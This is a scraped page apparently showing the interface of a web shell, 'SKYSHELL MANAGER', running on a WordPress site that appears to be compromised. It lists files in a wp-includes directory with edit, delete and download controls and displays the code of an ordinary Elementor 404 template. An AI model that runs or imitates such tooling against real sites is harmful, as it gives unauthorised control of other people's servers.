📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: 404-template.php
<?php $notfound_template = get_option( 'jkit_notfound_template' ); if ( jkit_is_multilanguage() ) { $notfound_template = jkit_get_multilanguage_post_id( $notfound_template ); } $page_template = get_page_template_slug( $notfound_template ); if ( 'elementor_canvas' === $page_template ) { ?> <!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes" /> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <div id="page" class="jkit-template <?php echo esc_attr( get_jkit_template_classes( '404' ) ); ?> find-404 site"> <?php echo \Elementor\Plugin::instance()->frontend->get_builder_content_for_display( $notfound_template, true ); ?> </div> <?php wp_footer(); ?> </body> </html> <?php } else { ob_start(); get_header(); /** Handled by Elementor self */ echo \Elementor\Plugin::instance()->frontend->get_builder_content_for_display( $notfound_template, true ); get_footer(); echo ob_get_clean(); }
Save